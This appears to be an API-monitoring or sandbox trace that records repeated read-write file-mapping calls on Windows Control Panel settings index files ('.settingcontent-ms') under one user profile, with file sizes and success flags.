Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{5ea4f148-308c-46d7-98a9-49041b1dd468}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{5ea4f148-308c-46d7-98a9-49041b1dd468}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1664 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{60AC7FA0-A928-4D45-B4DD-AC70A6175E67}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{60AC7FA0-A928-4D45-B4DD-AC70A6175E67}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{60C811E8-C857-404E-98BB-EE5D83C1DF5A}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{60C811E8-C857-404E-98BB-EE5D83C1DF5A}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1808 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{62d8ed13-c9d0-4ce8-a914-47dd628fb1b0}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{62d8ed13-c9d0-4ce8-a914-47dd628fb1b0}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1600 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{638f8e21-e157-40d7-97e0-a0c8e4c4e2b5}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{638f8e21-e157-40d7-97e0-a0c8e4c4e2b5}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1792 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{63929D0B-AAAC-4DCA-AE8A-222EC37F7A88}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{63929D0B-AAAC-4DCA-AE8A-222EC37F7A88}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{641102EF-6463-46E9-842D-176013D7ACC8}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{641102EF-6463-46E9-842D-176013D7ACC8}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{6775CCA4-CC42-44F7-800C-4E94FF1EA8C0}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{6775CCA4-CC42-44F7-800C-4E94FF1EA8C0}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1744 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{67ca7650-96e6-4fdd-bb43-a8e774f73a57}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{67ca7650-96e6-4fdd-bb43-a8e774f73a57}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1792 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\classic_{685e7dc2-db57-4ed0-8b6d-5fe44d78d4f0}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\classic_{685e7dc2-db57-4ed0-8b6d-5fe44d78d4f0}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1888 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{68F4F33C-658C-4278-94C1-22B8E653F3E8}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{68F4F33C-658C-4278-94C1-22B8E653F3E8}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1888 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{693E4EF4-9060-469B-AB2E-948B6B68A883}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{693E4EF4-9060-469B-AB2E-948B6B68A883}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1696 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{693E4EF5-9060-469B-AB2E-948B6B68A883}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{693E4EF5-9060-469B-AB2E-948B6B68A883}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1696 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{6A10BC7B-2586-4B57-A5AA-C14BDE743DC4}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{6A10BC7B-2586-4B57-A5AA-C14BDE743DC4}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1728 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{6AE88B06-50B2-46B0-93EA-4B5C73D3A0B5}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{6AE88B06-50B2-46B0-93EA-4B5C73D3A0B5}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1744 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{6CA1F1CE-1FED-4D96-A82E-08CEDB139AA3}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{6CA1F1CE-1FED-4D96-A82E-08CEDB139AA3}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1776 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{6CBA2898-2EFE-4604-9933-F1F64DAE2A32}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{6CBA2898-2EFE-4604-9933-F1F64DAE2A32}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1984 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{6dfd7c5c-2451-11d3-a299-00c04f8ef6af}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{6dfd7c5c-2451-11d3-a299-00c04f8ef6af}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1600 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{71D0780F-10D2-459C-983B-94A642161220}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{71D0780F-10D2-459C-983B-94A642161220}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1760 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{725be8f7-668e-4c7b-8f90-46bdb0936430}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{725be8f7-668e-4c7b-8f90-46bdb0936430}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1600 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{73C9C58C-2E01-4F68-B1B9-7A4DD2EF71F7}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{73C9C58C-2E01-4F68-B1B9-7A4DD2EF71F7}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1712 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{7429F4F9-AE58-401a-82AD-723F3C6BDDD6}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{7429F4F9-AE58-401a-82AD-723F3C6BDDD6}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1760 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{75AC9145-7EC9-4883-82A7-AD3429020AA0}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{75AC9145-7EC9-4883-82A7-AD3429020AA0}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{76F31A78-3FDA-4F80-B015-95CFD81463AD}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{76F31A78-3FDA-4F80-B015-95CFD81463AD}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1936 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{7a4d0c5d-51ad-443e-87c7-66b757586c56}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{7a4d0c5d-51ad-443e-87c7-66b757586c56}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1904 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{7ABBE8E6-757F-419A-B2E0-07D5694F8E0F}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{7ABBE8E6-757F-419A-B2E0-07D5694F8E0F}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1712 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{7C3E0552-96E2-4069-AC1C-208C146683CA}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{7C3E0552-96E2-4069-AC1C-208C146683CA}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1952 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{7D13A5DB-6081-48BD-8EA3-A9D7FE67A335}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{7D13A5DB-6081-48BD-8EA3-A9D7FE67A335}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1776 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{7DE6CF7C-B699-421B-A808-139E798E6C64}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{7DE6CF7C-B699-421B-A808-139E798E6C64}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1888 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{7E5BC096-F558-419A-9326-BC6414D592C3}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{7E5BC096-F558-419A-9326-BC6414D592C3}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1792 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{7F8B6C83-2A89-47A0-B334-AA58D042CDEC}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{7F8B6C83-2A89-47A0-B334-AA58D042CDEC}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1760 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{8050502B-9B94-408C-BF49-D2D8887C1BCF}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{8050502B-9B94-408C-BF49-D2D8887C1BCF}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1792 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{80f3f1d5-feca-45f3-bc32-752c152e456e}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{80f3f1d5-feca-45f3-bc32-752c152e456e}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1664 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{821FB666-D307-4865-86BB-68725A30999C}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{821FB666-D307-4865-86BB-68725A30999C}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1984 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{84C9670E-825D-4128-B173-2963886C5A3E}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{84C9670E-825D-4128-B173-2963886C5A3E}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1808 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{8562B9B8-812D-420C-9189-DC216D788A49}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{8562B9B8-812D-420C-9189-DC216D788A49}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1728 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{875FE7D6-5BDF-496F-B349-91E5E3625B86}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{875FE7D6-5BDF-496F-B349-91E5E3625B86}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1824 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{87842A7E-D784-458d-BEF4-CFDC632DCF3E}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{87842A7E-D784-458d-BEF4-CFDC632DCF3E}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1792 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{87d66a43-7b11-4a28-9811-c86ee395acf7}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{87d66a43-7b11-4a28-9811-c86ee395acf7}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1824 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{886EDAFC-1051-483F-8AE2-904087A7E580}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{886EDAFC-1051-483F-8AE2-904087A7E580}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1888 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{88C9D04D-39DD-41EE-A63B-23218D69717F}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{88C9D04D-39DD-41EE-A63B-23218D69717F}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1744 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{8902C92D-5AB7-433B-9065-3F55F8334E29}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{8902C92D-5AB7-433B-9065-3F55F8334E29}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2016 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{895607E0-D0F9-48bd-B19E-96FBE9BBDCF9}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{895607E0-D0F9-48bd-B19E-96FBE9BBDCF9}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1792 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{8bb27ec5-5cb3-4781-baee-3439df4806e4}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{8bb27ec5-5cb3-4781-baee-3439df4806e4}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1712 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{8D58F804-9520-4208-A527-7C2B6CB77B33}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{8D58F804-9520-4208-A527-7C2B6CB77B33}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2096 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{8E0C279D-0BD1-43C3-9EBD-31C3DC5B8A77}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{8E0C279D-0BD1-43C3-9EBD-31C3DC5B8A77}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1808 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{8E21794E-9303-44C5-A493-C3DC53C0E463}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{8E21794E-9303-44C5-A493-C3DC53C0E463}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1808 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{8e908fc9-becc-40f6-915b-f4ca0e70d03d}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{8e908fc9-becc-40f6-915b-f4ca0e70d03d}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1616 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{906435EC-336D-4B77-BCD6-397DE8318852}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{906435EC-336D-4B77-BCD6-397DE8318852}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{907F262A-012A-4F6A-94C9-F479F3E6EE16}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{907F262A-012A-4F6A-94C9-F479F3E6EE16}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1904 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{90ab71ce-bab6-4ca2-84fe-629338405756}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{90ab71ce-bab6-4ca2-84fe-629338405756}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1712 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{91BA8E01-F854-4418-A108-E63323DDAE60}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{91BA8E01-F854-4418-A108-E63323DDAE60}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1760 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{9389633E-8BCB-4448-93CD-EBFFA0759257}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{9389633E-8BCB-4448-93CD-EBFFA0759257}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1920 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{9430DB91-B966-4971-A955-E3DBA1F889E7}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{9430DB91-B966-4971-A955-E3DBA1F889E7}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{944A41B9-C0FD-41AE-A6DF-5AC4FE5A59B4}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{944A41B9-C0FD-41AE-A6DF-5AC4FE5A59B4}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1728 True 1
Fn
